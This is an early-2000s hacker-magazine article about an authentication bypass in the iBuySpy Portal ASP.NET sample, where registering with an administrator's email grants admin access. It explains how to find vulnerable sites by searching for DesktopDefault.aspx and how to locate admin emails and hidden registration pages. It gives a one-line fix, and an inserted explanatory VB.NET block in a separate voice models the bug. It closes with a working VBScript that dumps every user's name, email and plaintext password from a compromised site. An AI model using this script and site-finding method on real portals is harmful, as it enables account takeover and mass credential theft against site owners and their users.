iBuySpy Portal Software

by Papa Doc

History

Sometime around January 2002, Micro$oft and Vertigo Software released a large ASP.NET sample application with source code called the iBuySpy Portal.

This was meant to be an example of how to build complete application solutions using ASP.NET.  See www.asp.net.

What is the iBuySpy Portal?

iBuySpy Portal is a framework for a web-based portal application.

If you are unfamiliar with iBuySpy, take a minute or two to look at the sample site (www.ibuyspyportal.com).  Since the release a lot of small businesses and individuals have started to run sites with the iBuySpy Portal framework.

The Main Problems

1.)  There is a major security bug in the registration system that can allow anyone to easily gain administrative access to the site.

2.)  User passwords are stored plain text.

The Security Hole

The security problem is in the user registration module (register.aspx).

If a user tries to register/create an account with an email address that is already in the database, the registration module will log the user on as the account belonging to the email address, regardless of the name, password, or other information supplied!

Some administrators have noticed this problem and secured the hole; most have not.  And since this is a fully functional sample application, many beginners download it and run it nearly as is.

Finding iBuySpy Sites

Besides the visual style clues, the easiest hint that a site is using iBuySpy is the file naming convention.

The default name for the main page is DesktopDefault.aspx and I have only found one or two sites out of hundreds that have changed this.  A quick [DesktopDefault.aspx] Google will yield thousands of results, not to mention the iBuySpy forums.

What is the Big Deal?

Well, if it isn't already obvious: if the person registering on an unfixed site registers with the email address of an administrator, he/she is automatically logged on with full administrative rights.

The iBuySpy Portal has a powerful administrative menu which can add/edit/delete nearly every piece of content on the site, not to mention give access to the user database (which as I said before has plaintext passwords).

Another Problem

The administrator's password is normally right out in the open.  Especially on sites that aren't highly customized.

Miscellaneous

Some administrators running iBuySpy have decided to "disable" logins/user accounts so they remove the registration/logon/logoff links from the pages.

The sad thing is that I have found many of them neglect to delete the registration pages and only delete the links.  So as long as the location of the registration page can be determined, a user can still register and log on as admin.

The default registration page location is: http://www.example.com/Admin/Register.aspx

The admin's email address should not be hard to find.  It can normally be found on a "Contact" info page or on a discussion board.  If you look, you will find it.

Concluding Notes

As of the time this article was written, users who download iBuySpy Portal from www.asp.net will still be downloading an insecure application.

I find it disturbing that some administrators have found this problem and fixed it on their systems, yet Micro$oft still has an extremely insecure product (free or not) available to download... not to mention it is an incredibly easy fix (one line of code).

I just figured I'd share the information in case any of you ran iBuySpy or used sites that did.

If you find an insecure site, please email the administrator about the problem, along with the bug fix.  Readers of this magazine are always preaching about the bad name hackers get.  Well, I challenge you to practice what you preach and help admins, not take advantage of them.

The Fix

In the file: Admin/Register.aspx.vb

Find the line that calls the AddUser() function, and change it to this:

If accountSystem.AddUser(Name.Text, FName.Text, LName.Text, Reference.Text, Email.Text, Password.Text) > 0 Then
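To make clear what that one-line change does, here is an added example (my own constructed model, not the iBuySpy project's code) of the registration flow described above: the data layer's AddUser() reports a duplicate email with a negative return value, the unfixed handler ignores that value and issues the logon anyway, and the fixed handler only logs the user on when an account was actually created. The UsersDB class, the field names and the LoggedOnAs stand-in for the forms-authentication cookie are all assumptions made for the example.

```vbnet
' Added example, not code from the iBuySpy Portal.
' UsersDB is a constructed in-memory stand-in for the portal's data layer;
' AddUser returns the new user ID, or -1 when the email already exists.
Imports System
Imports System.Collections.Generic

Public Class UsersDB
    Private ReadOnly users As New Dictionary(Of String, Integer)(StringComparer.OrdinalIgnoreCase)
    Private nextId As Integer = 1

    ' Returns the new user's ID, or -1 if the email is already registered.
    Public Function AddUser(name As String, email As String, password As String) As Integer
        If users.ContainsKey(email) Then Return -1
        users(email) = nextId
        nextId += 1
        Return users(email)
    End Function
End Class

Public Class RegistrationDemo
    ' Stand-in for FormsAuthentication.SetAuthCookie: records who got logged on.
    Public Shared LoggedOnAs As String = Nothing

    ' Unfixed behaviour: the return value of AddUser is never checked, so a
    ' registration with an existing email still ends in a logon as that email.
    Public Shared Sub RegisterVulnerable(db As UsersDB, name As String, email As String, password As String)
        db.AddUser(name, email, password)
        LoggedOnAs = email
    End Sub

    ' Fixed behaviour: log on only when AddUser actually created the account.
    Public Shared Function RegisterFixed(db As UsersDB, name As String, email As String, password As String) As Boolean
        If db.AddUser(name, email, password) > 0 Then
            LoggedOnAs = email
            Return True
        End If
        Return False
    End Function

    Public Shared Sub Main()
        Dim db As New UsersDB()
        db.AddUser("admin", "admin@example.com", "secret")   ' existing administrator (constructed)

        ' Someone registers with the administrator's email and a made-up password.
        RegisterVulnerable(db, "newuser", "admin@example.com", "anything")
        Console.WriteLine("Unfixed: logged on as " & LoggedOnAs)

        LoggedOnAs = Nothing
        Dim created As Boolean = RegisterFixed(db, "newuser", "admin@example.com", "anything")
        Console.WriteLine("Fixed: created=" & created.ToString() & ", logged on as " & If(LoggedOnAs, "(nobody)"))
    End Sub
End Class
```

Compiled and run as a console program, the unfixed path prints a logon as admin@example.com while the fixed path prints created=False and no logon; the only difference between the two handlers is the `> 0` test on the AddUser() return value.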

Also

I have also attached a VBScript that I wrote.

It isn't perfect code by any means.  It was whipped together just as an example.  It shouldn't be too hard to convert to Perl or whatever other scripting language you want.

To use this script, log onto an unfixed site with Internet Explorer as admin, configure the top six lines of code, and run it.

The result will be a text file of usernames, emails, and passwords for all users on the site.

ibuyspy.vbs:

'*******************************
'*****      ibuyspy.vbs    *****
'*******************************

fileName = "C:\test.txt"             ' The destination file name

rootURL = "http://www.somesite.com"  ' The URL before the DesktopDefault.aspx

adminTabIndex = "4"                  ' Once logged on, go to the Admin page and check
                                     ' for the "tabindex" and "tabid",
adminTabID = "6"                     ' they will be in the URL

url0 = "/DesktopDefault.aspx?"       ' Change this if the DesktopDefault.aspx
                                     ' has been renamed

url1 = "/Admin/ManageUsers.aspx?"    ' ditto

Set objBrowser = CreateObject("InternetExplorer.Application")

getUserList

Sub getUserList()
  Set fs = CreateObject("Scripting.FileSystemObject")
  Set a = fs.CreateTextFile(fileName, True)
  objBrowser.Navigate rootURL + url0 + "tabindex=" + adminTabIndex + "&tabid=" + adminTabID, False

  Do Until objBrowser.ReadyState = 4
  Loop

  Set Doc = objBrowser.Document
  theText = Doc.documentElement.outerHTML
  ' Cut the page down to the <SELECT id=allUsers> list on the admin page
  posA = InStr(1, theText, "allUsers")
  theText = Right(theText, Len(theText) - posA)
  posA = InStr(1, theText, "</SELECT>")
  theText = Left(theText, posA)
  posA = InStr(1, theText, "<OPTION value=") + 14

  ' Walk each <OPTION value=userID>userName</OPTION> entry
  Do Until (posA - 14) = 0
    posB = InStr(posA, theText, ">") + 1
    posC = InStr(posB, theText, "</OPTION>")
    userID = Mid(theText, posA, (posB - posA) - 1)
    userName = Mid(theText, posB, posC - posB)
    theText = Right(theText, Len(theText) - (posC + 9))
    a.WriteLine(userName + "," + getPass(rootURL + url1 + "userid=" + userID + "&username=" + userName + "&tabindex=" + adminTabIndex + "&tabid=" + adminTabID))
    posA = InStr(1, theText, "<OPTION value=") + 14
  Loop

  a.Close
  Set objBrowser = Nothing

End Sub

Function getPass(theURL)
  objBrowser.Navigate theURL

  Do Until objBrowser.ReadyState = 4
  Loop

  Set Doc = objBrowser.Document
  theText = Doc.documentElement.outerHTML
  ' The ManageUsers page prefills the Email and Password fields with the stored values
  posA = InStr(1, theText, "id=Email")

  If posA <> 0 Then
    posB = InStr(posA, theText, "value=") + 6
    posC = InStr(posB, theText, " ")

    rslt = Mid(theText, posB, posC - posB)

    posA = InStr(1, theText, "id=Password")
    posB = InStr(posA, theText, "value=") + 6
    posC = InStr(posB, theText, " ")

    rslt = rslt + "," + Mid(theText, posB, posC - posB)
  Else
    rslt = "ERROR"
  End If

  getPass = rslt

End Function
